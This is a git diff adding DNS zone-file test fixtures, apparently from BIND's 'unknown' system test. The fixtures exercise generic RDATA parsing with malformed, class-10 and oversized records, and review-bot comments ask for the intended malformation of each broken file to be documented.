734E399AA0A835F3FF711F45BFF3CF6B97CDB74A5A1B53F9CDC0547F 04C5076D20B178AB4D01465D9B96E23C28A269A4786FA7C33FFFCFCD AB07B8CD88E7AA3CB670D9301D535FB42ECF9B85B0D8A7431A2CB123 7F2899AF67E1CF09819E01E1CBB2EDAB0CD1AE2FC6E07E7B194EE18F 8821D144DCCC49D0550E6AFE464FDC7ED36903AB42A2BFDAEE5FAF95 B909742E3F30D567D09B928A61E23B30970E8AEF268FD27CC1A76BAE 51E95EBA7A04CC574DB34127F41F48AD0F60F3CB522DE070B533C0B0 060275E300D767B7F767C4AA3FA465DC24B84F2CFD8AD4A61038D225 CA4DC038201C8D094EA1B9443338A351D9BC43FA73059EB3C2C173A5 
647046441DC3AD6F71FE1A37E90095B6D1799E5D749E1953417477B0 70A2465EFBED1A5267A9AA4EC2FD10B609039690FBCF9EA57E875803 1BCE78B8ADF94C539753E35DE5E8E300A527E7EC9C04E3B6E7E56F86 F32400B25895C90AD3E03CA49226548F6808A70081CD75D99BB561DA 5390F2D3418C4079311549F89E7E4E6539AC904756A7557DE633C817 9DF1B9B98C8AC5763C3854EE0743EF600BBB4F698FAC7982B5944E81 DE5B84903DE5D692E00A390291A4FD85E6080CEE16B5AC1DC70348F4 F037F7C3A87E003AF3ECBB184AD9E8F0802E66748E3CBAA73D286424 2278A7C12F5A741FA4A2BDD65302DDB14DC2F466FF960082E4281593 22115FDAE1F8022CBB1F58DF88CC724FCE517512F87BCF4DD7EB1BD5 DDA30BAAE2CDDFE95059F19680C51089F4EFFB3C6B8BC66CBB5B9157 4D352DB346C260BA58BBD6C1EA29EBE4D03335B3E7B34B2DA5AE1C69 CEBC4DB7822752AC827AF8934C9EFF227B72844626BB97ADCFE1DD7A 4407320C3D81C136759F5DF02FB50719B5D7078F15CBD37D25A2F9C3 88E98EA4D33CDA3977A886B97D607B2FF1D564E2B9D6A044B40FB5EB F0B46ED087287F9FA0A9D4382C98965004011815EFCC28ECD159D68A D96932A35FDEA0EFE3CEB317CC537A55E7464B066A6FDA767F872EA0 2C12FF8C89686236273BA562E4EC6FCF0E166190814DBC08DD30654A 84DB902FCBFBDA00C09BB4EF56A3A54139FB230618426675D6661866 EF870E26DAA0F275E5C680EA4B8AA5CC048D1F4C93CE3A28ED6D2B67 5336CB20A00FF06AD6CF40ED779B93E3BCB71227BFB374F58C96D69A 874008D82295316EBD6394DAFC393922DE1719DAE26A1A309CC42065 35C88A55DA7C4A0F7CFA29A9D0F21BB9DC4D8448FCB5D807D3700276 9FD786525FC5F365E2EC2DACEA3287F0D203B3DF87A3CB09562FCB8B 45BB6AC955FF94C4B72F3B18F0DF78648B5A339A0BCCBEB35D8E5BD9 CF58D1D77E957790F18E2BF6018E32080BCA6BD34EFEC9760518C9E6 5416DBD9EC0E7D9F242892FC45B66E862298FBAB0D1855B762D1C505 072D06FAB0FA99CC518D8830E6FA0AEF5977E116606874DFEF1756ED 555798DAAA3FE8078A19E892B94DB166BA6A99C63C79F1F62AF6A319 601CC304CA52A8883ECFC3647C069B832169D91BCE1145995B514CA7 3D70EDC34A3887E5217279251946241447B7AAC95DDE21FAF82AC2C0 44B0013E7577877A8ED5320F8E874058D96EAAC621566A0994D762EA 58C9A3A9029645273D27AF538215B3CF672FAB49838D87CAAB2A91C9 B80E8E80306F73143A00D6AF61037D196E593D585892835BF6B87ECE 1EF5D439780BEB20CB674F5B885CC368EBAFF8D4BA43BCA4962A09D6 
DCB771BAEF7E3DF9
diff --git a/bin/tests/system/unknown/ns1/broken1.db b/bin/tests/system/unknown/ns1/broken1.db
new file mode 100644
index 0000000..cee3832
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/broken1.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+a A \# 5 0A000001
diff --git a/bin/tests/system/unknown/ns1/broken2.db b/bin/tests/system/unknown/ns1/broken2.db
new file mode 100644
index 0000000..b06ce83
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/broken2.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+a A \# 4 0A00000100
diff --git a/bin/tests/system/unknown/ns1/broken3.db b/bin/tests/system/unknown/ns1/broken3.db
new file mode 100644
index 0000000..24c0aed
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/broken3.db
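Review bot: broken1.db does not say which malformation it carries, and the same is true of broken2.db through broken5.db; the five files differ only in their last record, so a reader has to decode the `\#` generic RDATA by hand to see what the loader is meant to reject. A one-line comment above that record would fix this, e.g. `; declared RDATA length 5, but only 4 octets follow` here, `; declared length 4, but 5 octets follow` in broken2.db, `; length and data agree (5), but an A record is 4 octets` in broken3.db and `; TYPE255 is a query meta-type, not zone data` in broken5.db. broken4.db looks like an SOA whose second name ends in a compression-pointer octet (`C4`); that reading should be confirmed and then stated the same way. Because these are negative fixtures for length handling in the generic-RDATA parser, naming the intended failure also lets the test script (not visible in this part of the diff) check that each file is rejected for that reason rather than for any load error.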
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+a A \# 5 0A00000100
diff --git a/bin/tests/system/unknown/ns1/broken4.db b/bin/tests/system/unknown/ns1/broken4.db
new file mode 100644
index 0000000..448bc4b
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/broken4.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+soa SOA \# 32 026E73013300 04726F6F74C4 00000001 00000001 00000001 00000001 00000001
diff --git a/bin/tests/system/unknown/ns1/broken5.db b/bin/tests/system/unknown/ns1/broken5.db
new file mode 100644
index 0000000..b868a6c
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/broken5.db
@@ -0,0 +1,23 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+any TYPE255 \# 2 AB CD
diff --git a/bin/tests/system/unknown/ns1/class10.hints b/bin/tests/system/unknown/ns1/class10.hints
new file mode 100644
index 0000000..cf78245
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/class10.hints
@@ -0,0 +1,13 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 3600
+. NS ns.
diff --git a/bin/tests/system/unknown/ns1/example-class10.db b/bin/tests/system/unknown/ns1/example-class10.db
new file mode 100644
index 0000000..ba69aad
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/example-class10.db
@@ -0,0 +1,31 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+
+a1 A \# 4 0A000001
+a2 CLASS10 A \# 4 0A000001
+
+txt1 TXT \# 6 0568656C6C6F
+txt2 TXT "hello"
+txt3 CLASS10 TXT \# 6 0568656C6C6F
+txt4 CLASS10 TXT "hello"
+
+unk1 TYPE123 \# 1 00
+unk2 CLASS10 TYPE123 \# 1 00
diff --git a/bin/tests/system/unknown/ns1/example-in.db b/bin/tests/system/unknown/ns1/example-in.db
new file mode 100644
index 0000000..9b4b8ec
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/example-in.db
@@ -0,0 +1,56 @@
+; Copyright (C) Internet Systems Consortium, Inc. ("ISC")
+;
+; SPDX-License-Identifier: MPL-2.0
+;
+; This Source Code Form is subject to the terms of the Mozilla Public
+; License, v. 2.0. If a copy of the MPL was not distributed with this
+; file, you can obtain one at https://mozilla.org/MPL/2.0/.
+;
+; See the COPYRIGHT file distributed with this work for additional
+; information regarding copyright ownership.
+
+$TTL 300 ; 5 minutes
+@ SOA mname1. . (
+ 2000062101 ; serial
+ 20 ; refresh (20 seconds)
+ 20 ; retry (20 seconds)
+ 1814400 ; expire (3 weeks)
+ 3600 ; minimum (1 hour)
+ )
+ NS ns
+ns A 10.53.0.1
+
+a1 A \# 4 0A000001
+a2 A \# 4 0A 00 00 01
+a3 CLASS1 A 10.0.0.1
+a4 CLASS1 A \# 4 0A000001
+a5 TYPE1 10.0.0.1
+a6 TYPE1 \# 4 0A000001
+a7 CLASS1 TYPE1 10.0.0.1
+a8 CLASS1 TYPE1 \# 4 0A000001
+a9 IN TYPE1 10.0.0.1
+a10 IN TYPE1 \# 4 0A000001
+a11 IN TYPE1 \# 4 0a000001
+a12 IN A \# 4 0A000001
+
+null IN NULL \# 1 00
+empty IN NULL \# 0
+empty IN TYPE124 \# 0
+
+emptyplus IN TYPE125 \# 0
+emptyplus IN TYPE125 \# 1 11
+
+txt1 IN TXT "hello"
+txt2 CLASS1 TXT "hello"
+txt3 IN TYPE16 "hello"
+txt4 CLASS1 TYPE16 "hello"
+txt5 TXT \# 6 0568656C6C6F
+txt6 TYPE16 \# 6 0568656C6C6F
+txt7 IN TXT \# 6 0568656C6C6F
+txt8 IN TXT "\#" 2 0145
+txt9 IN TXT \# text
+
+unk1 TYPE123 \# 1 00
+unk2 CLASS1 TYPE123 \# 1 00
+unk3 IN TYPE123 \# 1 00
+$INCLUDE large.db
diff --git a/bin/tests/system/unknown/ns1/large.db b/bin/tests/system/unknown/ns1/large.db
new file mode 100644
index 0000000..ada9930
--- /dev/null
+++ b/bin/tests/system/unknown/ns1/large.db
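Review bot: The records `txt8 IN TXT "\#" 2 0145` and `txt9 IN TXT \# text` carry no comment, although they appear to be the cases where `\#` has to be read as ordinary text rather than as the generic-RDATA marker. That distinction is an easy one for a parser change to break silently, so I would add `; quoted "\#" is literal text, not the unknown-format marker` above txt8 and a matching line above txt9 once the expected parse is confirmed. The two `emptyplus` TYPE125 records (a zero-length RDATA next to a one-octet one at the same name) would benefit from a similar one-line statement of what they are meant to exercise.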
@@ -0,0 +1,3011 @@ +; Copyright (C) Internet Systems Consortium, Inc. ("ISC") +; +; SPDX-License-Identifier: MPL-2.0 +; +; This Source Code Form is subject to the terms of the Mozilla Public +; License, v. 2.0. If a copy of the MPL was not distributed with this +; file, you can obtain one at https://mozilla.org/MPL/2.0/. +; +; See the COPYRIGHT file distributed with this work for additional +; information regarding copyright ownership. + +large IN TYPE45234 \# 48000 ( 45841674994e4f5e4ba43aada754d631 + dfb7e12155e7f10c551032b3e56ed5ba + 5136c15cda201e7e5e54fb60a99388b6 + 1a565c1cf74cd8aae1aee7fbeb54cebe + e065cf2b1b317f67277ae733183c668b + a81a7efec322d36fb5cc6293ad7f7ae3 + 544a7c64d404c4eeb1b889e9780a213b + d548a018be2e1b6a3b8840d714ddb8c0 + a66beaa4c2a1471d216ad0eb8d2c8849 + 60d30fd3fad058c47eace42aab0f0d40 + a690ca3baf9616b7373b889788e89175 + 7ae0eeaccd291d87d05daed8631d1ebf + 9202f81659754ca11221e902a69c7bf0 + 039310edf5305ace5404ddd02163be0a + 22334879a27bfa7702e13d06f1588726 + 1a12abfd0c01966fa67f97ed38c521db + cff8a2aa8daf53f1eaa7991b6767da0e + 68b2ebb38beb8f1aadaa30c1185870da + d0091e7af0bbed453ce081ba5dc87ca5 + a764592ed7312c6a26f7e358ef35182a + 49763a61c9a0c5dbddcf199251381215 + 51eb3c3ced9f529f03a85429f42f7550 + 3efa6e1301aa7ad9b29c5aaaa1ef6ee5 + bbe9e2639d65baf98a6b06243483a245 + 3969f65f9a0dad3d8630522079b8c107 + 9e28057d63696739b71f57ee85ab20a5 + 96865d77ef70412c7a4be7d9d5a4eb13 + 709f0ec1af6a4cf962364761ebd62efb + 4f16ee843c1b214944eff2c81563c4ac + 4c854c32972df761f17fdcac3e40e027 + 57fdf1fa57f77e1c86c3d488b02d4634 + 501801be4f929ffde0ed07112093d901 + 8d59cee1733bfdc8a968a831d42b95c0 + 87a578e3c6eefacfa1c9089072ab490d + 631b2d00cb75cb33586917f103842856 + ca2f5ccd449465b4a86a37f8147d6269 + 69f02dafacd4ba81b680e5dc288037ad + a3be902e2ef9c129710200ac93f5d3bf + 1c1418b65d98bdf101d38d9b2c5f25a3 + d09a4638dcc2c0d0cf411f3ed747e674 + 5ac7a8be03ea2ee990979cf3b8398c4b + fb058012de25fbf0e1081c4205afc54d + 3bda63565bc0bc3f6af91f083abc26ac + 
7047e2759f28525498ae6461a1f66b90 + 0fde5d8cd6c842c587f28620444ad5bd + 3b522f0294c14e2279b5c577f3f41c15 + a723a20259805aa18360f6b954b75d98 + beecd0c0a0ad151b0027cca891932adf + ca9b7eca33fd585031c188f8d851e3bb + c8552f340e1319553bfe776975baee6a + cf025b8c4849c0a430049734114b7534 + 5228d19846b39580f1c328068a4b36c4 + 3ef13380be7e54060acd9494ee99908f + 57e779a4c20728135d509b52d5066cc7 + bac77f1c4fcf81e9f0c7cf621593e90f + 398c56b14fddc74f62a4854655cb27b1 + dc94a83f9a4a52055ea74ea3129f88cb + 8d01870bfd5157cb966cfa4121e018c2 + dd72f363dfa5011d1072fd9350dde79b + ec213520cd68ccea356ee24b2c3e8487 + 1540c410353e9514188a46771b07b2b0 + e261287d353a8d55a71077b4b509fb99 + c80d7d07f6739cbc9ed82a5a40e624c0 + 860a42049585c0abc164b6e5e726da58 + b6faf8384e0c8e9a03bae074415335ba + c4e72aad561cb77a8d7aad25c67f3d74 + f38b62f43a2012fbe62c0def6be94809 + 8dbcbb0f06769663b8e6a7c0d88ac914 + dbb8baa785f4509b2decad57f85516d2 + aef23a24202b4123f4ce41e97653b5f3 + 8e7e092c8ebfdc36a46d204237ae7148 + 4f4249740c2eca7beace1699ccaac0da + a6ad8c1a0c5aeb59086c2179a235085d + 0c68942c8fbd67ec7fcf627049df4790 + 757f40d7d027fbeae4a358edd5867c7f + 5671046038e3086d76d3e22f868dbe60 + c64eb123bbf15358fd7d5b6511cedecf + a701494b143f77f7463d8e3099b811e8 + ab53092b3ef6e995a655086bcf61eb77 + 3900d425132a04530befc404f5bc27d9 + 8dd2367bb815580f8bb7cbef47936806 + 48959a44a6cd216196a4bd61d1cc4432 + 6869877e2be943c6c7bb95b854117b1a + 0b00d33083afe54461024bd791b2724b + ed82edd289f9376c7e0502627e1e3672 + 345dc53f1f25afb60568ca28c84b9214 + d32fb5d805cdd31324640519c3dd0b65 + 19fa93ab15d734fc0c5abbfa90c910c9 + 0c3f38b0688b584b6285427f760414c9 + 445b415fe433908035081f5ca081ab53 + cc7c2701f65a18a5e64eba887bad3343 + 2735c1e62ad2b35f0a258892d919835d + fa523e2bac6ddebdc0c576401f21d937 + 711d774153a7ec42125d24d115240fad + b90fe0061d9ec041ef2905e4aa3e81c4 + 53572df0f72a43d070492261dcad2817 + 4f8b16979db03c2f96d9e53cbfef510a + 1bb5d6cfbc4f92a9e94c0c018738e2a9 + 30922603083124284b076fc1f93afb20 + 878ccf756c8de07dc6d01c273ff26081 + 
36a8dce64ba4287cc19e35b72b40a32b + 435f3bfbe94a97f0972aebb4c54d95f4 + 993eb831307d22647a1eb7c525fd470f + b9ca13d3404ca5ecff99e87b73c5b88f + d4a905220db8d183c325e7d27a4d70f7 + 1469ed347ab68a9f7f1a5ea235bcd9f9 + bbbef91a9df227109d715941f54ea464 + c9f8a9d0724bd4c9772023b086bd521c + 516449c780500cb33630ae28cf02c19c + 0958faee545b953ca46217b7ad600679 + acd85dcfeccf4012aa9d5a7e1a1b1a43 + c7d9a91f8766ed3a5ef61a7a0840bee2 + b8eeccd5932cb1438a7aa271ce6906bd + c3d9230ab8d0b095be53869b37455d0b + ac413f518e39767f23fc669aa0742b8b + 5196fedd1284c27d05372f4653618962 + 468ae24a6c575daea152d036619adb96 + 5487d0631b6182a0ebdd5aac519abbc1 + cbe766283788e8fce8ce91760edb4cda + c1636de694364fed377b9dd5512bb258 + ff28533ca454ee161e69a58f7964a88a + fafe768340ed78896d02fcc6d0009072 + 8c86c3c21cf4b89eeb975e2a674b64da + 5bc5d05f6d647252e7b3394031bc9b45 + 65c466e5d9b8d9c2dd96a9950ae0d879 + bfd8c343709968f0d4a885d9c0a4ad22 + b08fa3cb093dcd583afd49966cb842f3 + e739fc665ae78550914896a2d8f66072 + 6e02b7847afaf327990a3478362c091f + 2b0bf7dd8afd4f935141e63c7c4a680b + b02bf84ba0e2fbce5fcacf1cd51c7732 + e97a358dbff58dc07ae2cfc5f66ef5a8 + 532f31bfcfa86886751ecfe4d3234c3e + c84eabcb9de56bd72847e894ac95103f + eb7de2c89780e7377ed61a1bd813f649 + 57419bd798632aa7b5a43d5e90463fe5 + db8373a91487e71ab990c0b68c4f8630 + 5a3cb78216c98188d9c4ff715d7cc72b + d4b64253b4a894b2b9a3f7aa6c41a1ed + 2a7cc3553c3716c6d3ca42e4746a1801 + 93ff49e0b8063412ef9df6217c97d30f + b7ecc5abacf22e08105b0b09807b3f3c + df66a695f46f5ace7fff41208859ca38 + 610f6a91368685c9ef8e68958acab3c7 + f198a484acd6592cdd0f1507af662a61 + e9fe8eb40efeebed64888802978952dd + 21c9d903b2be0845c3611a138c2750b1 + 35d0d55fae5ae23a8274da034e28d2b7 + 760f82ab2f83ab1cd34d9c45f7fb6352 + 7845704a4e68cf578c8604f269f70db8 + f4462980eeaaa40ac20076fdddfa2f2f + 31ae7e031388ed6bcbf0da39fd210351 + c956151c5a69b8db3ecba80b6da822a8 + 58e8d5abc24d3afbade4b8fac50cd36f + 3926af3cc6917d2a54a83540bbc96eca + dbcdba189849b07b865538b3b4fe142d + 2dfc0dec688da44b3c0b8c4605a00cc8 + 
26bd5826a8e43f225e75d246de2c8963 + 94ac9169746689010f2e958029f874a0 + 84813663bf14a38111685457842be856 + 6c634fe7bd34a0846b82929dc357f06b + a186a3a6917521881a1b84473b9d6be8 + c10dda27655bcef81ac6e717cca29e9e + 0f6a02578b7a6f97cec7b600785c4ace + 6eafe9f7f604f7540538f96501467456 + bf132d1f52555de292c21e3aa5fc24cd + 57e2a65e742e2fec311f3cbd19b9b4f8 + e9c5a66191f4c19b8f641d9c7fa58338 + f179b533dcbf6a88849e4bd01b094b5b + 8b09bbf3095f683029dfa61a4c91a582 + df0380aa4a0abc97a7ba9735bc7c2894 + ae6883b42cdca772626c31088c1684f6 + 4dea810199c2d48a5467db001ba4e274 + c0f7a5e762cc615a91fe537b356c7d76 + d24d310ef4d6d1e19f1788fed740686e + 9bce08e6b06b99a3bb71004775639924 + 20fc70bb75b783820df34c3f7595e7ef + c3e225ea5f2b33c05f515e1d3b4da67b + 0dd461e1a82260b6d2b7a0a43265a800 + 3a5fd13f57cf05878211c6e1eb8c635a + 2c8d1533f0260fad1df4fa41ce398e09 + 74a5ea54aebecf6e9ae57562baa826c9 + 831c56cab61565e2697e96f563d55b75 + b48a4fb6f32c02ebc2bfec9fd519c396 + fff42f1c4953dcd2ede87f62ea90cdb1 + acbac2b187ef71047de4477514612593 + fd7f849e4190a59bc147ea07b794e088 + 0ea37f5f27aa5fa78905f64956682538 + 90699e319f14d54996e36e1f6dded0c9 + 552605ad9d20f8f4e6dd26fdb7fc6814 + 15f15d47e4997995a671f85f56e54a14 + 6d1e16c7909b0efd42cafb92f12b9f4f + 88157a68ccf8dcf3295ae65d26dd5323 + 3cd414f73881a5fed934c577b7c66f48 + 4965e1ea507f2fdb20141a9c6458f222 + 65e26ce6ac906b4bd43f178331328bea + 55c61e737f2f130e51f0ed343a9e9709 + 036abe6338446b8ca7b9cd831f4c6390 + 8fcb6eb134626f89df0a134f9f7cd196 + bc96a5ddd2b2cc5530220d4708d5d2fc + 55eb64ecc1b668970e7df11faeb37826 + 30a3792089e2a0443631aec02cf8078c + 8cacb3bbfff7304670b391690ae1a29b + 445a46cf78b84d26e830b8d072c2f0a2 + 292cf29ae11f509855c1972d5f86a137 + 73fe91954b2eb5c8e75b9554c082fe65 + ea01d0d6794d621b231db56dd59eeebe + 4d71144b966c19b402dbaa25d051f9dc + ab7f063142d35123d9ca28a89a4cf3e7 + 71095f794f6a7d495870ac9f47d1e024 + b5341c931590225b76931999c9d341d8 + cdea4d0443d719e09ed227584243480b + 618246a318addf475a70f3be57c3278e + 23d48874e26824864abe829ca2318dde + 
c436d182040f014d4fbcb1fbdbf2ab82 + b613b7ddb45dc7635796a6ab203f8d9a + 6a04c08b40be8452b4058eb6199ff68c + a8a570f1a179ed662e4fbc1ddb8364cc + abdb7d25eb9bfa6844d4d379fff7161f + 13d287af0b6b9ef3d2c164bc63d412f0 + 4cc3ddbeda6d973838b329108388ef70 + 0e42e232009782d380127200412e2767 + 1df2b17d5d7fa517ce12c66d6b84b113 + 65611cb11e0bf27b06f3b86c4b4572e6 + 3702dad0a3f9784656d16f7b731951fa + efd190b4f7e0322871a2733c30670c31 + 1db6f8c24e51c747525d04e551dfe1ec + 6a20e796d0b7f4be73896895fd6bf922 + b02bdc0c1412317ac0975d0cbc8c5a01 + f17f842c9cdef7cdb02055425bb1ee0f + be46bab2fb6c3d3e3d86eb066edd23b5 + 7f18c3b9fec9c6c3d8d41b77dada06f0 + 8890490354f95e97fecee7f6bde50325 + f659971d8940c6b299531ec9e07413cd + b92ea26db7ae21a151cd59bfe72b8a19 + 998384ee8985cc47544edc79f5f266f0 + 887664db09136792e75dfbc306db725e + 5d1089de94e3305a3db61b799a22ebea + 3a72c52a9eaa89a2983f47fd0c685445 + d30c6023c855613f33e023e1a7312076 + 2816b70ca46fe2bf0c14b9706da2f993 + fe00053ac68280337b92fe344695da64 + cae061541164bcadaefaecee529aef20 + f053010426633aad07a98d8d6453ad01 + 64951d85c5db7965f6b845c01ee4b13d + a933cb152151e8052bd6052b22ced3f3 + ce96040a23b6661ae078930970cd342d + 2464c0638c7988d06a5ddf9130fd4148 + a8221febf8200323c42890e57ad3c60a + e443c72f60388f755bd0f8d8082bc7cc + 7c26b280b6c186fee3e7161793be25c8 + 373d7714e1db51f9af53809cde5c1141 + a183a84643b4d8cd3d1777e9f5c70f08 + 22c115f2c663d2c02315eb183caa4122 + 703e24792756ffa86077feb7e4fde230 + 4ccb5a8ae1b2bb506699ebff1067c50e + 835f8cacb46e0fc93216764f999687f6 + bc9f93516b777391d03cb2c74dcab8f5 + a3cd2f0c2715548f8eb36b1b138d0d95 + 9513884ce3b6a4f7a835943687c92d9e + 95c9bd30aeece528c9965c4c927f21f5 + 84f37b42075188d24e2ede898e55a6e3 + 3b7357792ba7fabef7cb09e1814d6f2d + d1d5c8d029d2421ee6fd905b393d9d47 + ad6b9f2805ec387154e88251c2e066a9 + eb378e00c7ee4e52872dcd718c67308c + 6388bf175ec90ff818f49c4f80633dba + 8351d0f162a5ffcd9642e553e6763dfb + 97b52899ffbd4614568eb13a730b1adb + a54a41445e70bc6f1bc5723fd236b133 + b966ee67d9604efcbc828eaee587598d + 
afc81f0c71efe2d5d07c41959df2636b + 3b3054903534d678e436382ea38d8d24 + 041b7a254dddb783ffa19aa7c128d5a9 + 32bc8ac3e04df72305cee70433d4920c + 35d22b21d2dcfa2a4640b7afa4134c15 + 30ca677d175de1be666b24408ca698aa + c57a5d9dd41b9737ce9cf73c3027ad2c + 50d80ae4b3966b00459ef11505297e09 + 6b86933efa71830b010fbc41d7832de0 + da01e9edddb1aea400f535cc4b601e80 + f95e17e0fa104bcf16a3c4514a8f2f6a + fc59669b1f2de45895a6ce3800823f3a + fab29e44077f5b4689240d10e62c1282 + b6f8e15f922e02cc2d9cbb40f2722fb6 + efd6c8e921575df9a46d3fa7e014b0e9 + 1e1204f4081052d93a0871c35ce92b92 + ff3c49f90fc42727d5c9405540dc8406 + 499fe053fd146423a888e1a3e0728c69 + 381e0a2221adc4d0bf9b51f7ddd4a8ea + 74bfdf20054b935998de4cc852faf089 + 07f5c2a33686eff3572d55e6227a3cb9 + c463d0cf6a2a617516ed7f5993f4530b + 46d2791902e12daf36a73c6ca7b6d486 + 592c2e85b2fe942492240e3b6012a8d1 + f28d37f1f2b43cd94d7b93aa56de82d4 + 135a84190272ccb9a6ab606d5a929f0b + c2b0d0485429f2b8066307e0404ff7eb + fd02eff231838d43bfe1d8ecb77372ab + ce6daa1a48b37c9d30d94c12e81388b1 + 0845b62bb311325929a21712930c5d61 + d058f5f8abce4c198ddc482034407b7f + 360ba1a65b2e3b3037c06c3cad7c706c + db45ab39c9317be281bdf524c2ffdb29 + c6b3be40b91b62cb7735a463829c4cb8 + bad28ceda3d8b955791e75b8405a6c03 + 9615dbd9dee3ba95f922bca586a39119 + fec0f510fcc5c5ce70c9d6b09cb0a47f + 314c09c3735c7e7c74784ef20953111f + 3eb067547167a78827072356df64c101 + f536a075a2aca016e13a9f8695e2e7c0 + 9e56be291a75958c3de58351e50124dc + b4846c97b58427c344b773b27f5d49f4 + b781a13c87adaca9fae45bf53a8e9f6a + 8485d476297dd31ad7c635dc4bf775d2 + f869e79e3e92f0af0ab2f0c9c610e76b + 8a83998eee7eab21d3b6f4280754f165 + 3d076df87fd2c41fb744f41d20f54063 + 1dfa55adad22879abe3498a425c035e6 + 24bd8032fc55f131319152da21a415ec + fdfbde3a847f86ee4221d7c84d76f56a + da0d8895f2545bb4b3f4176934a4c07e + 22921b23934b7e08993102d33094042a + fa053c95ab0254a0f8dcd9305569c270 + cec22e49db90462320cfd05642ee9fbc + a1a9f28d0ad119cdfe19b7a7902f039f + fc484795a0379fe0c83743b915863881 + 1be89cfaa14a10f3ed22249d5a57c4af + 
